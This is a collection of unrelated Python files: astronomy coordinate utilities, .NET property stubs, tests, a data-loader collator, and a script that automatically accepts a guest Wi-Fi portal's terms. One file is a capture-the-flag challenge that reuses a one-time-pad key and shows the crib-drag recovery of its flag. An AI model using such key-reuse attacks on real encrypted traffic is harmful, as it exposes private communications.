th = Thread(target=self.add_ele_in_res, args=(pivot_ele,))
threads.append(th)
th.start()
for ele in part2_arr:
th = Thread(target=self.add_ele_in_res, args=(ele,))
threads.append(th)
th.start()
for th in threads:
th.join()
print(SleepSort([3, 1, 5, 4, 2]))
print(SleepSort([5, 4, 3, 2, 1]))
print(SleepSort([1, 2, 3, 4, 5]))
print(SleepSort([4, 5, 1, 2, 3]))
print(SleepSort([3, 4, 5, 1, 2]))
|
python
|
"""
The 'requests' library must be installed before this program can be used.
"""
import requests
def auto_reconnect():
"""
    Automatically reconnect to the guest Wi-Fi login portal.
    The original ClientURL (cURL) command was converted to Python for
    compatibility with all platforms.
    The program starts by accepting the cookies provided on the web page,
    then opens the provided link and accepts the terms-and-conditions
    button.
"""
cookies = {
'_ga': 'GA1.2.490792435.1536769170',
}
headers = {
'Host': 'conditions.bruyere.org',
'User-Agent': 'Safari/5.0 (X11; Linux i686 on x86_64; rv:52.0) Gecko/20100101 Safari/52.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Referer': 'https://conditions.bruyere.org/fs/customwebauth/login.html?switch_url=https://conditions.bruyere.org/login.html&wlan=GuestWifi&statusCode=1',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
}
data = {
'buttonClicked': '4',
'redirect_url': '',
'err_flag': '0'
}
response = requests.post('https://conditions.bruyere.org/login.html', headers=headers, cookies=cookies, data=data)
print("Terms and Conditions : Accepted automatically without user interference")
#### Once the terms and conditions are accepted the algorithm prints the confirmation statement ####
if __name__ == '__main__':
auto_reconnect()
|
python
|
class DependencyPropertyDescriptor(PropertyDescriptor):
""" Provides an extension of System.ComponentModel.PropertyDescriptor that accounts for the additional property characteristics of a dependency property. """
def AddValueChanged(self,component,handler):
"""
AddValueChanged(self: DependencyPropertyDescriptor,component: object,handler: EventHandler)
Enables other objects to be notified when this property changes.
component: The component to add the handler for.
handler: The delegate to add as a listener.
"""
pass
def CanResetValue(self,component):
"""
CanResetValue(self: DependencyPropertyDescriptor,component: object) -> bool
Returns whether resetting an object changes its value.
component: The component to test for reset capability.
Returns: true if resetting the component changes its value; otherwise,false.
"""
pass
def Equals(self,obj):
"""
Equals(self: DependencyPropertyDescriptor,obj: object) -> bool
Compares two System.ComponentModel.DependencyPropertyDescriptor instances for
equality.
obj: The System.ComponentModel.DependencyPropertyDescriptor to compare with the
current instance.
Returns: true if the values are equivalent; otherwise,false.
"""
pass
@staticmethod
def FromName(name,ownerType,targetType,ignorePropertyType=None):
"""
FromName(name: str,ownerType: Type,targetType: Type,ignorePropertyType: bool) -> DependencyPropertyDescriptor
Returns a System.ComponentModel.DependencyPropertyDescriptor for a provided
property name.
name: The registered name of a dependency property or an attached property.
ownerType: The System.Type of the object that owns the property definition.
targetType: The System.Type of the object you want to set the property for.
ignorePropertyType: Specifies to ignore the property type.
Returns: The requested System.ComponentModel.DependencyPropertyDescriptor.
FromName(name: str,ownerType: Type,targetType: Type) -> DependencyPropertyDescriptor
Returns a System.ComponentModel.DependencyPropertyDescriptor for a provided
property name.
name: The registered name of a dependency property or an attached property.
ownerType: The System.Type of the object that owns the property definition.
targetType: The System.Type of the object you want to set the property for.
Returns: The requested System.ComponentModel.DependencyPropertyDescriptor.
"""
pass
@staticmethod
def FromProperty(*__args):
"""
FromProperty(dependencyProperty: DependencyProperty,targetType: Type) -> DependencyPropertyDescriptor
Returns a System.ComponentModel.DependencyPropertyDescriptor for a provided
dependency property and target type.
dependencyProperty: The identifier for a dependency property.
targetType: The type of the object where the property is set.
Returns: A System.ComponentModel.DependencyPropertyDescriptor for the provided
dependency property.
FromProperty(property: PropertyDescriptor) -> DependencyPropertyDescriptor
Returns a System.ComponentModel.DependencyPropertyDescriptor for a provided
System.ComponentModel.PropertyDescriptor.
property: The System.ComponentModel.PropertyDescriptor to check.
Returns: If the property described by property is a dependency property,returns a valid
System.ComponentModel.DependencyPropertyDescriptor. Otherwise,returns a
nullSystem.ComponentModel.DependencyPropertyDescriptor.
"""
pass
def GetChildProperties(self,*__args):
"""
GetChildProperties(self: DependencyPropertyDescriptor,instance: object,filter: Array[Attribute]) -> PropertyDescriptorCollection
Returns a System.ComponentModel.PropertyDescriptorCollection.
instance: A component to get the properties for.
filter: An array of type System.Attribute to use as a filter.
Returns: A System.ComponentModel.PropertyDescriptorCollection with the properties that
match the specified attributes for the specified component.
"""
pass
def GetEditor(self,editorBaseType):
"""
GetEditor(self: DependencyPropertyDescriptor,editorBaseType: Type) -> object
Gets an editor of the specified type.
editorBaseType: The base type of editor,which is used to differentiate between multiple
editors that a property supports.
Returns: An instance of the requested editor type,or null if an editor cannot be found.
"""
pass
def GetHashCode(self):
"""
GetHashCode(self: DependencyPropertyDescriptor) -> int
Returns the hash code for this
System.ComponentModel.DependencyPropertyDescriptor.
Returns: A 32-bit signed integer hash code.
"""
pass
def GetValue(self,component):
"""
GetValue(self: DependencyPropertyDescriptor,component: object) -> object
        Returns the current value of the property on a component.
component: The component instance.
Returns: The requested value.
"""
pass
def RemoveValueChanged(self,component,handler):
"""
RemoveValueChanged(self: DependencyPropertyDescriptor,component: object,handler: EventHandler)
Enables other objects to be notified when this property changes.
component: The component to add the handler for.
handler: The delegate to add as a listener.
"""
pass
def ResetValue(self,component):
"""
ResetValue(self: DependencyPropertyDescriptor,component: object)
Resets the value for this property of the component to the default value.
component: The component with the property value that is to be reset to the default value.
"""
pass
def SetValue(self,component,value):
"""
SetValue(self: DependencyPropertyDescriptor,component: object,value: object)
Sets the value of the component to a different value.
component: The component with the property value that is to be set.
value: The new value.
"""
pass
def ShouldSerializeValue(self,component):
"""
ShouldSerializeValue(self: DependencyPropertyDescriptor,component: object) -> bool
Indicates whether the value of this property needs to be persisted by
serialization processes.
component: The component with the property to be examined for persistence.
Returns: true if the property should be persisted; otherwise,false.
"""
pass
def ToString(self):
"""
ToString(self: DependencyPropertyDescriptor) -> str
Converts the value of this instance to its equivalent string representation.
Returns: Returns the System.ComponentModel.MemberDescriptor.Name value.
"""
pass
AttributeArray=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets an array of attributes.
"""
Attributes=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the collection of attributes for this member.
Get: Attributes(self: DependencyPropertyDescriptor) -> AttributeCollection
"""
Category=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the name of the category that the member belongs to,as specified in the System.ComponentModel.CategoryAttribute.
Get: Category(self: DependencyPropertyDescriptor) -> str
"""
ComponentType=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the type of the component this property is bound to.
Get: ComponentType(self: DependencyPropertyDescriptor) -> Type
"""
Converter=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the type converter for this property.
Get: Converter(self: DependencyPropertyDescriptor) -> TypeConverter
"""
DependencyProperty=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Returns the dependency property identifier.
Get: DependencyProperty(self: DependencyPropertyDescriptor) -> DependencyProperty
"""
Description=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the description of the member,as specified in the System.ComponentModel.DescriptionAttribute.
Get: Description(self: DependencyPropertyDescriptor) -> str
"""
DesignerCoerceValueCallback=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a callback that designers use to modify the effective value of a dependency property before the dependency property value is stored in the dependency property engine.
Get: DesignerCoerceValueCallback(self: DependencyPropertyDescriptor) -> CoerceValueCallback
Set: DesignerCoerceValueCallback(self: DependencyPropertyDescriptor)=value
"""
DesignTimeOnly=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets whether this member should be set only at design time,as specified in the System.ComponentModel.DesignOnlyAttribute.
Get: DesignTimeOnly(self: DependencyPropertyDescriptor) -> bool
"""
DisplayName=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the name that can be displayed in a window,such as a Properties window.
Get: DisplayName(self: DependencyPropertyDescriptor) -> str
"""
IsAttached=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value that indicates whether the property is registered as an attached property and is being used through an attached usage.
Get: IsAttached(self: DependencyPropertyDescriptor) -> bool
"""
IsBrowsable=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value that indicates the value of the System.ComponentModel.BrowsableAttribute on the property.
Get: IsBrowsable(self: DependencyPropertyDescriptor) -> bool
"""
IsLocalizable=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether this property should be localized,as specified in the System.ComponentModel.LocalizableAttribute.
Get: IsLocalizable(self: DependencyPropertyDescriptor) -> bool
"""
IsReadOnly=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether this property is read-only.
Get: IsReadOnly(self: DependencyPropertyDescriptor) -> bool
"""
Metadata=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the metadata associated with the dependency property.
Get: Metadata(self: DependencyPropertyDescriptor) -> PropertyMetadata
"""
NameHashCode=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the hash code for the name of the member,as specified in System.String.GetHashCode.
"""
PropertyType=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the represented System.Type of the dependency property.
Get: PropertyType(self: DependencyPropertyDescriptor) -> Type
"""
SupportsChangeEvents=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Indicates whether value change notifications for this property may originate from outside the property descriptor,such as from the component itself,or whether notifications will only originate from direct calls made to System.ComponentModel.DependencyPropertyDescriptor.SetValue(System.Object,System.Object).
Get: SupportsChangeEvents(self: DependencyPropertyDescriptor) -> bool
"""
|
python
|
from pathlib import Path
import pytest
import caption_contest_data as ccd
filenames = list(ccd._api._get_response_fnames().keys())
DUELING_XFAIL = """These contests are dueling bandits, not cardinal bandits
(which have pairwise comparisons, not single caption ratings).
These aren't officially supported.
"""
def _get_file(f):
if "dueling" in str(f) or "497" in str(f):
return pytest.param(f, marks=pytest.mark.xfail(reason=DUELING_XFAIL))
return f
@pytest.fixture(params=[_get_file(f) for f in filenames])
def df(request):
filename = request.param
ccd.get_responses()
return ccd.responses(filename)
def test_responses(df):
expected = {
"contest",
"network_delay",
"response_time",
"participant_uid",
"timestamp_query_generated",
"filename",
"alg_label",
"target",
"target_id",
"target_reward",
"timestamp_query_generated",
"label",
}
assert set(df.columns) == expected
|
python
|
from pdip.cqrs.decorators import requestclass
from pdi.application.operation.CreateDataOperation.CreateDataIntegrationConnectionDatabaseRequest import \
CreateDataIntegrationConnectionDatabaseRequest
from pdi.application.operation.CreateDataOperation.CreateDataIntegrationConnectionFileRequest import \
CreateDataIntegrationConnectionFileRequest
from pdi.application.operation.CreateDataOperation.CreateDataIntegrationConnectionQueueRequest import \
CreateDataIntegrationConnectionQueueRequest
@requestclass
class CreateDataIntegrationConnectionRequest:
ConnectionName: str = None
Database: CreateDataIntegrationConnectionDatabaseRequest = None
File: CreateDataIntegrationConnectionFileRequest = None
Queue: CreateDataIntegrationConnectionQueueRequest = None
Columns: str = None
|
python
|
"""Astronomical coordinate functions."""
import re,pdb
import numpy as np
from numpy import arccos,sin,cos
from math import pi
# constants
DEG_PER_HR = 360. / 24. # degrees per hour
DEG_PER_MIN = DEG_PER_HR / 60. # degrees per min
DEG_PER_S = DEG_PER_MIN / 60. # degrees per sec
DEG_PER_AMIN = 1./60. # degrees per arcmin
DEG_PER_ASEC = DEG_PER_AMIN / 60. # degrees per arcsec
RAD_PER_DEG = pi / 180. # radians per degree
def ang_sep(ra1, dec1, ra2, dec2):
""" Returns the angular separation (in units of degrees) on the
celestial sphere between two ra/dec coordinates given in degrees.
Accepts numpy arrays.
Note: only works for separations larger than about 0.1 arcsec.
Smaller separations are always returned as zero, because of
floating point effects.
>>> np.allclose(ang_sep(2, 0, 4, 0), 2.)
True
>>> np.allclose(ang_sep(359, 0, 1, 0), 2.)
True
>>> np.allclose(ang_sep(0, 20, 0, -10), 30)
True
>>> np.allclose(ang_sep(7, 20, 8, 40), 20.018358)
True
>>> np.allclose(ang_sep(7, 20, 250, -50.3), 122.388401)
True
>>> ang_sep(-1, 10, 240, -10) # doctest: +ELLIPSIS
Traceback (most recent call last):
...
ValueError: RA outside sensible limits. -1
>>> ras = [24.5,23.6]; decs = [66.89,67.01]
>>> ref_sep = np.array([3.520032, 3.26675])
>>> np.allclose(ang_sep(20. ,70., ras, decs), ref_sep)
True
>>> ras = [24.5, 23.6]; decs = [91.89, 67.01]
>>> ang_sep(20.0, 70.0, ras, decs) # doctest: +ELLIPSIS
Traceback (most recent call last):
...
ValueError: Dec outside sensible limits. [ 91.89 67.01]
"""
ra1 = np.asarray(ra1); ra2 = np.asarray(ra2)
dec1 = np.asarray(dec1); dec2 = np.asarray(dec2)
# error checking
# for ra in ra1,ra2:
# if not ((0. <= ra)&(ra < 360.)).all():
# raise ValueError("RA outside sensible limits. %s" % ra)
# for dec in dec1,dec2:
# if np.any(np.abs(dec) > 90.):
# raise ValueError("Dec outside sensible limits. %s" % dec)
ra1 = ra1 * RAD_PER_DEG # convert to radians
ra2 = ra2 * RAD_PER_DEG
dec1 = dec1 * RAD_PER_DEG
dec2 = dec2 * RAD_PER_DEG
sra1 = sin(ra1); sra2 = sin(ra2)
cra1 = cos(ra1); cra2 = cos(ra2)
sdec1 = sin(dec1); sdec2 = sin(dec2)
cdec1 = cos(dec1); cdec2 = cos(dec2)
csep = cdec1*cdec2*(cra1*cra2 + sra1*sra2) + sdec1*sdec2
# An ugly work-around for floating point issues.
#if np.any(csep > 1): print csep
csep = np.where(csep > 1., 1., csep)
degsep = arccos(csep) / RAD_PER_DEG
# only works for separations > 0.1 of an arcsec or >~2.7e-5 dec
degsep = np.where(degsep < 1e-5, 0, degsep)
return degsep
def _dec2s(ra, dec,
raformat='%02.0f %02.0f %06.3f', decformat='%02.0f %02.0f %05.2f'):
"""
Converts decimal RA and Dec (both in degrees) to sexagesimal RA
(hours/minutes/seconds) and Dec (degrees/arcmin/arcsec). Returns
two strings, RA and Dec.
doctests:
>>> dec2s(156.1125638,-10.12986)
('10 24 27.015', '-10 07 47.50')
>>> dec2s(0.0,-90.0)
('00 00 00.000', '-90 00 00.00')
>>> dec2s(148.2,95.0)
Traceback (most recent call last):
...
ValueError: Decimal RA or Dec outside sensible limits.
>>> dec2s(360.0,-30.1)
Traceback (most recent call last):
...
ValueError: Decimal RA or Dec outside sensible limits.
"""
ra = float(ra)
dec = float(dec)
if dec < 0.:
dec *= -1.
negdec = True
else: negdec = False
# error checking
if not (0.0 <= ra < 360.) or dec > 90.:
raise ValueError("Decimal RA or Dec outside sensible limits.")
rah, temp = divmod(ra, DEG_PER_HR)
ram, temp = divmod(temp, DEG_PER_MIN)
ras = temp / DEG_PER_S
s_ra = raformat % (rah, ram, ras)
decd, temp = divmod(dec, 1)
decm, temp = divmod(temp, DEG_PER_AMIN)
decs = temp / DEG_PER_ASEC
if negdec:
s_dec = '-' + decformat % (decd, decm, decs)
else: s_dec = '+' + decformat % (decd, decm, decs)
return s_ra,s_dec
def dec2s(ra,dec):
""" Convert and ra and dec (or list of ras and decs) to decimal
degrees.
"""
try:
return _dec2s(ra, dec)
except TypeError:
pass
radec = [_dec2s(r,d) for r, d in zip(ra, dec)]
return zip(*radec)
def _s2dec(ra,dec):
""" Converts two strings of sexigesimal RA (hms) and Dec (dms) to
decimal RA and Dec (degrees). The separators between h/m/s and
deg/arcmin/arcsec can be whitespace or colons. Returns a tuple of
two floats, (ra, dec).
doctests:
>>> s2dec('00:00:00', '90:00:00')
(0.0, 90.0)
>>> temp = np.array(s2dec ('10 24 27.015', '-10 07 47.50'))
>>> reference = np.array([156.1125625,-10.129861111111111])
>>> np.all(temp - reference < 1.e-10)
True
>>> s2dec('25:11:19', '-18:4:88')
Traceback (most recent call last):
...
ValueError: Either RA or Dec is outside sensible limits.
RA = 25 11 19, Dec = -18 4 88
"""
# Convert to floats, noting sign of dec
ra = re.sub('[:hms]', ' ', ra)
dec = re.sub('[:dms]', ' ', dec)
rah,ram,ras = [float(item) for item in ra.split()]
if dec.lstrip()[0] == '-':
negdec = True
else: negdec = False
decd,decm,decs = [float(item) for item in dec.split()]
if negdec: decd *= -1.
# Error checking
if (not 0. <= rah < 24. or not 0. <= ram <= 60. or not 0. <= ras <= 60.
or decd > 90. or decm >= 60. or decs > 60):
raise ValueError('Either RA or Dec is outside sensible '
'limits.\nRA = %s, Dec = %s' % (ra,dec))
# Conversion
d_ra = DEG_PER_HR * rah + DEG_PER_MIN * ram + DEG_PER_S * ras
d_dec = decd + DEG_PER_AMIN * decm + DEG_PER_ASEC * decs
if negdec: d_dec *= -1.
return d_ra, d_dec
def s2dec(ra, dec):
""" Convert a sexigesimal ra and dec (or list of ras and decs) to
decimal degrees.
"""
try:
return _s2dec(ra, dec)
except TypeError:
pass
radec = [_s2dec(r,d) for r, d in zip(ra, dec)]
return map(np.array, zip(*radec))
def match(ra1, dec1, ra2, dec2, tol, allmatches=False):
"""
match(ra1, dec1, ra2, dec2, tol)
Given two sets of numpy arrays of ra,dec and a tolerance tol
(float), returns an array of indices and separations with the same
length as the first input array. If an index is >= 0, it is the
index of the closest matching second array element within tol
arcsec. If it's -1, then there was no matching ra/dec within tol
arcsec.
if allmatches = True, then for each object in the first array,
return the index and separation of everything in the second array
within the search tolerance, not just the closest match.
Note to get the indices of objects in ra2, dec2 without a match, use
imatch = match(ra1, dec1, ra2, dec2, 2.)
inomatch = numpy.setdiff1d(np.arange(len(ra2)), set(imatch))
"""
from numpy.core.records import fromarrays
ra1,ra2,dec1,dec2 = map(np.asarray, (ra1, ra2, dec1, dec2))
abs = np.abs
isorted = ra2.argsort()
sdec2 = dec2[isorted]
sra2 = ra2[isorted]
LIM = tol * DEG_PER_ASEC
match = []
# use mean dec, assumes decs similar
decav = 0.5 * (sdec2.mean() + dec1.mean())
RA_LIM = LIM / cos(decav * RAD_PER_DEG)
for ra,dec in zip(ra1,dec1):
i1 = sra2.searchsorted(ra - RA_LIM)
i2 = i1 + sra2[i1:].searchsorted(ra + RA_LIM)
#print i1,i2
close = []
for j in range(i1, i2):
if abs(dec - sdec2[j]) > LIM:
continue
else:
# if ras and decs are within LIM arcsec, then
# calculate actual separation:
disq = ang_sep(ra, dec, sra2[j], sdec2[j])
close.append((disq, j))
close.sort()
if not allmatches:
# Choose the object with the closest separation inside the
# requested tolerance, if one was found.
if len(close) > 0:
min_dist, jmin = close[0]
if min_dist < LIM:
match.append((isorted[jmin], min_dist))
continue
# otherwise no match
match.append((-1,-1))
else:
# append all the matching objects
jclose = []
seps = []
for dist,j in close:
if dist < LIM:
jclose.append(j)
seps.append(dist)
else:
break
match.append(fromarrays([isorted[jclose], seps],
dtype=[('ind','i8'),('sep','f8')]))
if not allmatches:
# return both indices and separations in a recarray
temp = np.rec.fromrecords(match, names='ind,sep')
# change to arcseconds
temp.sep *= 3600.
temp.sep[temp.sep < 0] = -1.
return temp
else:
return match
def indmatch(ra1, dec1, ra2, dec2, tol):
"""
Finds objects in ra1, dec1 that have a matching object in ra2,dec2
within tol arcsec.
Returns i1, i2 where i1 are indices into ra1,dec1 that have
matches, and i2 are the indices into ra2, dec2 giving the matching
objects.
"""
m = match(ra1, dec1, ra2, dec2, tol)
c = m.ind > -1
i1 = c.nonzero()[0]
i2 = m.ind[c]
return i1, i2
def unique_radec(ra, dec, tol):
""" Find unique ras and decs in a list of coordinates.
RA and Dec must be arrays of the same length, and in degrees.
tol is the tolerance for matching in arcsec. Any coords separated by
less than this amount are assumed to be the same.
Returns two arrays. The first is an array of indices giving the
first occurrence of a unique coordinate in the input list. The
second is a list giving the indices of all coords that were
matched to a given unique coord.
The matching algorithm is confusing, but hopefully correct and not too
slow. Potential for improvement...
Example
-------
>>> ra,dec = np.loadtxt('radec.txt.gz', unpack=1)
>>> iunique, iextra = unique_radec(ra,dec,2)
>>> iknown, extraknown = np.loadtxt('radec_known.txt.gz', unpack=1)
>>> np.allclose(iunique, iknown)
>>> np.allclose(iextra, extraknown)
"""
matches = match(ra, dec, ra, dec, tol, allmatches=True)
imatchflat = []
for m in matches:
imatchflat.extend(m.ind)
#pdb.set_trace()
inomatch = np.setdiff1d(np.arange(len(ra)), list(set(imatchflat)))
assert len(inomatch) == 0
# Indices giving unique ra, decs
iunique = []
# Will be same length as iunique. Gives all indices in original
# coords that are matched to each unique coord.
iextras = []
assigned = set()
for j,m in enumerate(matches):
if not (j % 1000):
print(j)
# get the lowest index in this group
isort = sorted(m.ind)
ilow = isort[0]
if ilow not in assigned:
iunique.append(ilow)
assigned.add(ilow)
iextras.append([ilow])
# assign any extra indices to this unique coord.
for i in isort[1:]:
# check not already been assigned to another coord
if i not in assigned:
iextras[-1].append(i)
assigned.add(i)
return np.array(iunique), iextras
def parse_ra( inn ):
'''
Parse input Right Ascension string, either decimal degrees or sexagesimal HH:MM:SS.SS (or similar variants).
Returns decimal degrees.
'''
# if simple float, assume decimal degrees
try:
ra = float(inn)
return ra
except:
# try to parse with phmsdms:
res = parse_sexagesimal(inn)
ra = 15.*( res['vals'][0] + res['vals'][1]/60. + res['vals'][2]/3600. )
return ra
def parse_dec( inn ):
'''
Parse input Declination string, either decimal degrees or sexagesimal DD:MM:SS.SS (or similar variants).
Returns decimal degrees.
'''
# if simple float, assume decimal degrees
try:
dec = float(inn)
return dec
except:
# try to parse with phmsdms:
res = parse_sexagesimal(inn)
dec = res['sign']*( res['vals'][0] + res['vals'][1]/60. + res['vals'][2]/3600. )
return dec
def parse_sexagesimal(hmsdms):
"""
+++ Pulled from python package 'angles' +++
Parse a string containing a sexagesimal number.
This can handle several types of delimiters and will process
reasonably valid strings. See examples.
Parameters
----------
hmsdms : str
String containing a sexagesimal number.
Returns
-------
d : dict
parts : a 3 element list of floats
The three parts of the sexagesimal number that were
identified.
vals : 3 element list of floats
The numerical values of the three parts of the sexagesimal
number.
sign : int
Sign of the sexagesimal number; 1 for positive and -1 for
negative.
units : {"degrees", "hours"}
The units of the sexagesimal number. This is inferred from
the characters present in the string. If it is a pure number
then units is "degrees".
"""
units = None
sign = None
# Floating point regex:
# http://www.regular-expressions.info/floatingpoint.html
#
# pattern1: find a decimal number (int or float) and any
# characters following it upto the next decimal number. [^0-9\-+]*
# => keep gathering elements until we get to a digit, a - or a
# +. These three indicates the possible start of the next number.
pattern1 = re.compile(r"([-+]?[0-9]*\.?[0-9]+[^0-9\-+]*)")
# pattern2: find decimal number (int or float) in string.
pattern2 = re.compile(r"([-+]?[0-9]*\.?[0-9]+)")
hmsdms = hmsdms.lower()
hdlist = pattern1.findall(hmsdms)
parts = [None, None, None]
def _fill_right_not_none():
# Find the pos. where parts is not None. Next value must
# be inserted to the right of this. If this is 2 then we have
# already filled seconds part, raise exception. If this is 1
# then fill 2. If this is 0 fill 1. If none of these then fill
# 0.
rp = reversed(parts)
for i, j in enumerate(rp):
if j is not None:
break
if i == 0:
# Seconds part already filled.
raise ValueError("Invalid string.")
elif i == 1:
parts[2] = v
elif i == 2:
# Either parts[0] is None so fill it, or it is filled
# and hence fill parts[1].
if parts[0] is None:
parts[0] = v
else:
parts[1] = v
for valun in hdlist:
try:
# See if this is pure number.
v = float(valun)
# Sexagesimal part cannot be determined. So guess it by
# seeing which all parts have already been identified.
_fill_right_not_none()
except ValueError:
# Not a pure number. Infer sexagesimal part from the
# suffix.
if "hh" in valun or "h" in valun:
m = pattern2.search(valun)
parts[0] = float(valun[m.start():m.end()])
units = "hours"
if "dd" in valun or "d" in valun:
m = pattern2.search(valun)
parts[0] = float(valun[m.start():m.end()])
units = "degrees"
if "mm" in valun or "m" in valun:
m = pattern2.search(valun)
parts[1] = float(valun[m.start():m.end()])
if "ss" in valun or "s" in valun:
m = pattern2.search(valun)
parts[2] = float(valun[m.start():m.end()])
if "'" in valun:
m = pattern2.search(valun)
parts[1] = float(valun[m.start():m.end()])
if '"' in valun:
m = pattern2.search(valun)
parts[2] = float(valun[m.start():m.end()])
if ":" in valun:
# Sexagesimal part cannot be determined. So guess it by
# seeing which all parts have already been identified.
v = valun.replace(":", "")
v = float(v)
_fill_right_not_none()
if not units:
units = "degrees"
# Find sign. Only the first identified part can have a -ve sign.
for i in parts:
if i and i < 0.0:
if sign is None:
sign = -1
else:
raise ValueError("Only one number can be negative.")
if sign is None: # None of these are negative.
sign = 1
vals = [abs(i) if i is not None else 0.0 for i in parts]
return dict(sign=sign, units=units, vals=vals, parts=parts)
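# Illustrative examples (not from the original module) of how the parsers above
# compose; values are approximate:
# parse_ra('10 24 27.015')   -> 156.1125625   (bare numbers are read as h m s)
# parse_ra(156.1125638)      -> 156.1125638   (floats pass straight through)
# parse_dec('-10:07:47.50')  -> -10.129861...
# parse_sexagesimal('10h24m27s')['units'] -> 'hours'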
|
python
|
import os
from functools import reduce
def xor(a,b):
c=bytearray()
for i,j in zip(a,b):
c.append(i^j)
return c
msg1="did you expect another rsa? sorry"
msg2=" to disappoint you. What you see is a bad use "
msg3="of the otp in encryption. It literally says one"
msg4=" and not multi time. masrt{think_out_of_the_box_yeager}"
msg5="well done solving me, but are you done?"
msg6="This attack is called a crib drag or known-plaintext attack"
messages=[msg1,msg2,msg3,msg4,msg5,msg6]
L=reduce(max,[len(i) for i in messages] )
key=os.urandom(L)
open("key.txt","a").write(key.hex()+"\n")
with open("message.txt","w") as f:
for msg in messages:
f.write(xor(msg.encode(),key).hex()+"\n")
f.close()
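# A minimal follow-up sketch (not part of the original challenge script): because
# every line of message.txt was XORed with the same key, XORing any two
# ciphertexts cancels the key and leaves plaintext XOR plaintext, which a known
# crib then peels apart.
ct = [bytes.fromhex(line) for line in open("message.txt").read().split()]
p1_xor_p2 = xor(ct[0], ct[1])          # the key drops out entirely
crib = msg1[:20].encode()              # pretend only a fragment of msg1 is known
print(xor(p1_xor_p2, crib).decode())   # reveals the start of msg2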
|
python
|
import torch
from common.utils.clip_pad import *
import numpy as np
class BatchCollator(object):
def __init__(self, dataset, append_ind=False):
self.dataset = dataset
self.test_mode = self.dataset.test_mode
self.data_names = self.dataset.data_names
self.append_ind = append_ind
def __call__(self, batch):
if not isinstance(batch, list):
batch = list(batch)
if batch[0][self.data_names.index('image')] is not None:
max_shape = tuple(max(s) for s in zip(*[data[self.data_names.index('image')].shape for data in batch]))
image_none = False
else:
image_none = True
max_boxes = max([data[self.data_names.index('boxes')].shape[0] for data in batch])
max_question_length = max([len(data[self.data_names.index('question')]) for data in batch])
for i, ibatch in enumerate(batch):
out = {}
if image_none:
out['image'] = None
out['image1'] = None
else:
image = ibatch[self.data_names.index('image')]
image1 = ibatch[self.data_names.index('image1')]
out['image'] = clip_pad_images(image, max_shape, pad=0)
out['image1'] = clip_pad_images(image1, max_shape, pad=0)
boxes = ibatch[self.data_names.index('boxes')]
out['boxes'] = clip_pad_boxes(boxes, max_boxes, pad=-2)
question = ibatch[self.data_names.index('question')]
out['question'] = clip_pad_1d(question, max_question_length, pad=0)
array = [0 for i in range(15)]
if ibatch[self.data_names.index('index')] % 7 == 0:
array[7] = 1
out['index'] = torch.tensor(array)
other_names = [data_name for data_name in self.data_names if data_name not in out]
for name in other_names:
if name == 'boxes1':
boxes1 = ibatch[self.data_names.index('boxes1')]
out['boxes1'] = clip_pad_boxes(boxes1, max_boxes, pad=-2)
elif name == 'question1':
question1 = ibatch[self.data_names.index('question1')]
out['question1'] = clip_pad_1d(question1, max_question_length, pad=0)
else:
out[name] = torch.as_tensor(ibatch[self.data_names.index(name)])
batch[i] = tuple(out[data_name] for data_name in self.data_names)
if self.append_ind:
batch[i] += (torch.tensor(i, dtype=torch.int64),)
out_tuple = ()
for items in zip(*batch):
if items[0] is None or items[3] is None:
out_tuple += (None,)
else:
out_tuple += (torch.stack(tuple(items), dim=0), )
return out_tuple
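# Hedged usage sketch (the dataset and loader variables are illustrative, not
# from this repo): the collator is meant to be handed to a PyTorch DataLoader so
# variable-sized images, boxes and questions are clipped/padded to the maxima of
# each batch before stacking.
# loader = torch.utils.data.DataLoader(dataset, batch_size=8, shuffle=True,
#                                      collate_fn=BatchCollator(dataset))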
|
python
|
from .leaderboards import *
#from .nominationAssessmentTeam import *
from .players import *
#from .publicRanking import *
#from .qualityAssuranceTeam import *
#from .rankingTeam import *
#from .websiteUser import *
|
python
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helper functions for commonly used utilities."""
from sparkmagic.livyclientlib.endpoint import Endpoint
from sparkmagic.livyclientlib.exceptions import BadUserConfigurationException
from sparkmagic.utils.utils import initialize_auth, Namespace
class SerializableEndpoint():
""" A class that serializes an endpoint object for storing and restoring endpoints"""
def __init__(self, endpoint):
self.cluster = endpoint.auth.cluster_widget.v_model
self.url = endpoint.url
self.project = endpoint.auth.project_widget.v_model
self.region = endpoint.auth.region_widget.v_model
self.account = endpoint.auth.active_credentials
def get_stored_endpoints(db, ipython_display):
"""Gets a list of endpoints that were added in previous notebook sessions
Args:
db (dict): the ipython database where stored_endpoints list will be stored
ipython_display (hdijupyterutils.ipythondisplay.IpythonDisplay): the display that
informs the user of any errors that occur while restoring endpoints
Returns:
stored_endpoints (Sequence[dict]): A list of dicts, each dict storing an
Endpoint's writeable attributes. If no endpoints can be obtained from previous
notebook sessions, an empty list is returned.
"""
try:
stored_endpoints = db['autorestore/' + 'stored_endpoints']
return stored_endpoints
except KeyError:
